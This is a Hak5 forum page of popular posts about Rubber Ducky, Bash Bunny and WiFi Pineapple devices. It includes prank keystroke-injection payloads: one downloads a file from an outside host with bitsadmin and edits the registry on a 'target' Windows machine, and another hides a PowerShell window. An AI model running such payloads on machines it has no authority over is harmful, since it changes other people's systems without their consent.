Popular Content

Showing content with the highest reputation since 04/20/2019 in all areas

  1. 4 points
    I'm sure everyone at some point in their life has unplugged something from a Windows machine and heard the notification sound. This is obviously way too robotic and lifeless for my taste; here is a ducky payload that will replace device disconnect sounds with a scream. Just in case you want it to feel like a living thing that is suffering as you rip parts off of it. Inspiration from watching too much Michael Reeves.

    Requires internet access on the target Windows host; this is just the shortest/fastest way to drop this kind of payload. Other staging/injection techniques could be used to supplement the download. This will open run and execute the .wav download and registry changes in the background. Give it a couple of seconds to download. The change should be made by the time you remove the ducky from the target.

    ```
    DELAY 3000
    GUI r
    DELAY 350
    STRING cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' http://h4k.cc/s.wav %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
    ENTER
    ```

    This downloads a sample .wav (Doom). Replace the above url with another that hosts the desired .wav if you want to change the sound. Fastest way to encode this would be using our single file JS Duck Encoder: https://downloads.hak5.org/ducky
  2. 3 points
    Hi everyone! Inspired by the "Making Windows scream when you unplug devices" payload, I was thinking of other fun payloads you can do with the Rubber Ducky. Lately, a co-worker of mine showed me how you can play music with powershell and after I've seen that, I just had to make a payload with this feature. For those who aren't aware, you can use "beep" commands with powershell which will, when executed, play a tone. If you want to try it yourself, just open powershell and execute the following command:

    ```
    [console]::beep(500,300)
    ```

    When executed, you will hear a short "beep". You can find further information on the powershell beep command here: https://devblogs.microsoft.com/scripting/powertip-use-powershell-to-send-beep-to-console/

    So now we can make our own music using powershell. Luckily, there are already some tracks available such as "The Imperial March (Star Wars)" or "Mission Impossible". When I saw this, I just had to make a Rubber Ducky payload out of this. So every time you plug in the Rubber Ducky, it will execute the powershell script and play the Star Wars Imperial March.

    Here is the payload:

    ```
    DELAY 3000
    GUI r
    DELAY 250
    STRING powershell
    DELAY 250
    ENTER
    DELAY 500
    REM Hide the powershell window
    STRING Add-Type -Name W -Names C -M '
    ENTER
    STRING [DllImport("Kernel32.dll")]
    ENTER
    STRING public static extern IntPtr GetConsoleWindow();
    ENTER
    STRING [DllImport("user32.dll")]
    ENTER
    STRING public static extern bool MoveWindow(IntPtr h, int X, int Y, int W, int H);'
    ENTER
    STRING [C.W]::MoveWindow([C.W]::GetConsoleWindow(),0,0,-1,-1);
    ENTER
    REM Play the Imperial March
    STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);exit
    ENTER
    ```

    Of course one should be able to loop this so the song will keep playing, but I'll leave that up to you guys 🙂 I know it's a kinda meaningless but fun payload, so I hope some of you will enjoy it! - zSec
  3. 3 points
    Hi! We just released 2.5.4, which on top of 2.5.3, addresses a few issues that have been reported since the launch of 2.5.2 (thank you!). Catch the change log in the first post and upgrade via the WiFi Pineapple OTA or via the Download Center.
  4. 2 points
    Everyone can modify it and create pull requests to Hak5's module GitHub repo. A problem imo is that the reaver version on Hak5's repo is very much outdated. I'm cross-compiling the latest version of Reaver and keeping them updated as often as I can, but using the newest version requires heavy modifications to the WPS module, due to a lot of changes to Reaver.
  5. 2 points
    Hi, This isn't really the topic for this, but nonetheless, I apologise if you're not happy with your device. The book covers the fundamentals of operating the WiFi Pineapple and explains the attacks used as a Rogue AP. You can also find detailed help on each aspect of the Pineapple (read: the modules) via the Help module in the Web UI. If you have more questions that the help text doesn't answer, please feel free to make a new topic on the forums as this one is solely for new firmware releases. Thanks
  6. 2 points
    Hi friends, I don't have time for this yet. I will fix the bug as soon as I can.
  7. 2 points
    We remove all bad posts that are made and block accounts that are obviously spam as soon as we spot them or they are reported. If you want to help, get reporting.
  8. 1 point
    Well, I am back to tell you what really happened and why it acted the way it did. It is always the human factor; I never realized then I have a different power source on the PI3. (NOT ENOUGH POWER) I am still having a problem with the wp6.sh to make the connection and be on the net when you are on the dashboard to see the bulletin. But it fixes itself when you go on the network page on the GUI to connect at wlan0 🙂
  9. 1 point
    Made some great "white hat" usage of BashBunny this week. Bought a batch of new micro-PCs, built a golden image for them, saved it with CloneZilla. Loaded a bootable CloneZilla Live install on to BB, then made a HID/STORAGE payload that boots target into CloneZilla with pre-scripted restore, redirecting stdout back to /loot. Script on BB waits a few minutes for CloneZilla to complete, then BB reboots both the target and itself to make sure /loot is synced and visible, then checks the logfile for successful completion before LED FINISH. Bing bang boom! Fresh new PC ready to deploy with custom config. Lessons learned: It can be really hard to script blind HID keystrokes when the target might not be consistent each run (BIOS boot device menu sequence, for example). One workaround is to send multiple commands in a sequence that the target will ignore or fail recoverably if irrelevant. /loot doesn't automatically stay in sync between scripts running on BB and on the target when mounted as STORAGE. Having BB reboot itself was the only way I could reliably get it to see updates saved by the target. After a self-reboot, the same payload script can pick up where it left off by first detecting that a file is there now. If I really want real-time two-way communication between BB and target, probably need to use network instead of storage. Next time. Fun project! Thanks Hak5 for a truly useful tool.
  10. 1 point
    I'm sorry that you're not happy with your NANO. I looked through your post history and noticed that your first forum post was only yesterday at the time of writing, I would suggest allowing more time for a response on the forums as it's community-driven. If you could send me your support ticket number via Private Message, I'll take a look as soon as possible. Thanks
  11. 1 point
    That's the patch I put on. You don't know the power of the dark side. Tons for like a buck plus like 4 buck shipping on "wish"
  12. 1 point
    The tetra is an OpenWRT box. So just about anything you can do in Openwrt, you can do with the tetra. It would just take some sweet iptable-fu. Also, if you’ve got physical access to the wan box, the rj-45 is input only so you could hardline it to help cut down on the frequency traffic.
  13. 1 point
    Hi all - I understand the desire to use the infusions from the WiFi Pineapple Mark V era. As Seb has previously pointed out, unfortunately the older devices are no longer capable of securely downloading these infusions over the air from our infrastructure. That being said, all of the modules/infusions may be manually installed to either local or SD storage with ease. To that effect I have published the following article on docs.hak5.org - https://docs.hak5.org/hc/en-us/articles/360023458173 Happy hacking!
  14. 1 point
    Honestly, there really is no need to keep bumping this thread... If you run `make menuconfig` (as the link I provided states) and select "Hak5 WiFi Pineapple NANO" and then return to the CLI and run `make` you will get a bootable image for the device...
  15. 1 point
    You could also try using a link shortening service to make any long link much smaller.
  16. 1 point
    I recently downloaded jsencoder.html. When trying to launch spotlight on a MAC I have always used GUI SPACE which works fine with java duckencoder.jar. However on the newer jsencoder.html it doesn't work. Instead it's like it's opening the File menu of CHROME and initiating the save/save as command. Can anyone else confirm this on a mac? Any fixes? Thanks!
  17. 1 point
  18. 1 point
    IIRC 802.11n 5ghz yes and 802.11ac 5ghz no
  19. 1 point
    I would say this needs to go under here:
  20. 1 point
    I think I am onto something.. I have Japanese characters in my wifi names. Maaaybe it just doesn't like to connect to these. Tried to connect to the Pineapple's own open network and that worked fine with the wlan2 module. Will get around to changing the name today and post any progress.
  21. 1 point
    Give up explaining this. I did on several different threads about meta on the BB. All for people experimenting but I always said you will be there for a minute just for Meta to spin up...maybe 2 and another 4-5 for it to get done doing what it is doing. I know this because I tried running Meta and PowerShell Empire (which is much lighter than Meta) from a Raspberry Pi 3 and Zero. It takes a bit on the Zero that has more horse power than BB and even took awhile on the Pi 3 (new one) so I know it drags on the BB. I mentioned this before, it is much better to figure out what you want out of Meta and Bunnyize it to a much smaller payload designed for just that autopwn and not the autopwn plus the whole huge library Meta brings with it. Ruby has more overhead on load too so yeah. So, proceed at your own peril. Not a project I am pursuing since I have lots of Pis and stuff around me I can use as a USB rat or network rat plus other Hak5 products to do that stuff with...like the Lan Turtle with a remote C2 which can be a Pi sitting on the network somewhere. In my opinion, the BB was meant for quick in and out. Payloads should take that into consideration.
  22. 1 point
    Teaching the ethics behind cybersecurity is important. If students are going to abuse the device, especially against other students then it would make sense to restrict access to anyone caught abusing the device. While also encouraging the general student body to utilize services such as vpn, perhaps the university can provide a free vpn option for students and faculty. With that said, there are a myriad of legal and cool things that a pineapple can do that are not disruptive. That of course should be the academic focus. Some encouragement through things like hack-a-thons could even improve overall network security. Like a competition to establish a low cost vpn solution for the school. Wifi Nano is a great platform to begin development because it is a type of development environment too. Positives seem to outweigh negatives. Although a pineapple is a threat, an advanced user could easily create such attacks with their own hardware. Why would they need a pineapple, if they are that advanced; they probably know that...
  23. 1 point
    Attach a debug log here, generated via the Help module.
  25. 1 point
  26. 1 point
    You could theoretically brick it. But the Pineapples have that sweet factory-reset mode built into the bootloader. So as long as the bootloader isn't touched, you should be safe. Most upgrade files don't modify the bootloader.
  27. 1 point
    Your best option for help would be the discord channel. The forum is slow yes, but things do get answered eventually
  28. 1 point
    What firmware version are you using? And the 100% CPU on the dashboard is fine. If you ssh to the pineapple and run top it won't show constant 100% CPU.
  29. 1 point
    For all the people who are new at this whole “computer” thing and don’t really understand what hacking is all about and where to begin, I offer up these links to some great places to start learning. Please contribute to this thread and I will keep it up to date. Probably should be made sticky.

    News:
    - www.digg.com
    - www.slashdot.org

    Presentations:
    - http://www.lessig.org/freeculture/free.html <-- A speech given talking all about the problems facing culture when dealing with copyright and other digital laws.

    Podcasts:
    - http://www.grc.com/SecurityNow.htm <-- This is fantastic for people who are new to the field. If you have the time or motivation, go back and listen to them from day 1, they assume you know very little if anything and hit on all of the major topics in the security field. Fantastic show.

    IPTV Shows:
    - http://www.binrev.com/ <-- Produce a good IPTV show and also have forums that are usually helpful.
    - http://www.hak5.org <--- Duh....

    Tutorial sites:
    - http://www.remote-exploit.org <-- Pretty good resources, some very nice video tutorials on various exploits. Definitely check out the tutorial section.
    - http://www.irongeek.com/ <-- Excellent tutorials/information/articles.
    - http://www.antionline.com/ <-- Tutorials, tools and forums full of helpful people.

    Programming Related:
    - Teach Yourself C in 21 Days: http://neonatus.net/C/index.html
    - Teach Yourself C++ in 21 Days: http://cma.zdnet.com/book/c++/
    - The Art of Assembly Language Programming: http://maven.smith.edu/~thiebaut/ArtOfAssembly/artofasm.html
    - Microsoft Developers Network: http://msdn.microsoft.com

    Web Programming:
    - HTML: http://www.w3schools.com
    - PHP: http://www.php.net
    - ASP.NET: http://www.asp.net/Default.aspx?tabindex=0&tabid=1
    - SQL: http://www.mysql.com
    - Perl: http://www.perl.com/
    - Python: http://www.python.org

    Security Related:
    - SecurityFocus: http://www.securityfocus.com/
    - Milw0rm: http://www.milw0rm.com
    - SecurityForest: http://securityforest.com/wiki/index.php/Main_Page
  30. 1 point
  31. 1 point
    These forums are attracting more and more of this bullshit. Admins should be shit canning these members' accounts. IMHO.
  32. 1 point
    Have the same issue. No one in the discord can help me so like I'm just gonna give up
  33. 1 point
    Hello everyone! I haven't used my wifi pine in a while and it was working fine before I did an update. Since the update (2.4.2 and 2.5.2) it won't connect to the internet when I use wlan2 (second usb wifi adapter) and I can't seem to find a reason why. I can get it to connect to my PC with no issue but can't do it this way. Is there a fix or is it not working anymore?
  34. 1 point
    I am having the exact same issues.
  35. 1 point
  36. 1 point
    Good one hey, only thing missing is a cup of java a HackRF Looks like it could fit in there nicely
  37. 1 point
    The best way to protect the rogue AP is using the Filters tab. With proper recon, you should be able to identify the MACs or SSIDs of the target devices and add them to the filter. With the filters set to "allow" mode, only devices with a MAC address or SSID in one of the pools will be able to connect. If you are looking to minimize collateral damage then filters are a good choice. One of the benefits of a rogue AP attack is that you don't necessarily have to be inside of the building for it to be successful. If the employees have directly received instructions to connect to the rogue access point then that means a) the hacker has physical access to the building or b) has social-engineered someone into providing the credentials to employees. In either case, the hacker is already far beyond rogue access points in terms of potential harm to the company.
  38. 1 point
    Hey everyone, We have recently discovered a bug in the update process of the Bash Bunny, which causes boot-loops. The bug is triggered if the upgrade file had been extracted, renamed, or was otherwise altered. Fortunately, we have now found a fix for the issue:

    1. Plug in the Bash Bunny and unplug it immediately when the initial green LED turns off
    2. Repeat step #1 three times
    3. Plug the Bash Bunny back in and wait for it to reset. You should see either a "police" pattern or a red blinking LED.
    4. Set the switch to the switch1 position (furthest from the USB port)
    5. Wait for the device to reboot (indicated by the green led) and set the switch to arming mode immediately as the green light turns off. If all went well, you should now be able to access the Mass Storage partition of the Bash Bunny (or serial in).
    6. Delete any leftover update files (such as "ch_fw_1.3_264 (1).tar.gz")
    7. Safely eject / sync the Bash Bunny
    8. Reboot your device, by re-plugging it, while keeping the switch in arming mode.

    This should get your Bash Bunny up-and-running on firmware v1.0, allowing you to properly upgrade to the latest version. We recommend using the Bash Bunny Updater for this. We have released firmware 1.4 which prevents this bug from being triggered. Note: These instructions are not the same as the one from this thread. Similar, but more reliable.
  39. 1 point
    Q: Just lately I've noticed that when running PineAP, my mobile devices (iOS, Mac OS) aren't probing much. When I check the logs, I see that my neighbours' devices, and other devices where I'm scanning are making far more probes. I'd have expected the local/stronger signal devices to make the probes, especially as they've been more prevalent with their probing in the past. Any thoughts?
  40. 1 point
    here are some more links: http://www.hackthissite.org/ http://www.kellys-korner-xp.com/win_xp_passwords.htm http://www.lurhq.com/cachepoisoning.html http://www.mit.edu/hacker/hacker.html http://www.nostarch.com/download/hacking_ch3.pdf http://www.docdroppers.org/wiki/index.php?title=Hacking http://tinyurl.com/h9wws http://www.hackerthreads.org/phpbb/index.php http://www.library.2ya.com/
  41. 1 point
    All I have to say is, www.google.com
  42. 1 point
    Yeah it's hard to gauge what to suggest, everyone will be starting at different levels of expertise and wanting to focus on different areas. Perhaps once we gather a bit more content we should shift this to the Hak.5 Wiki?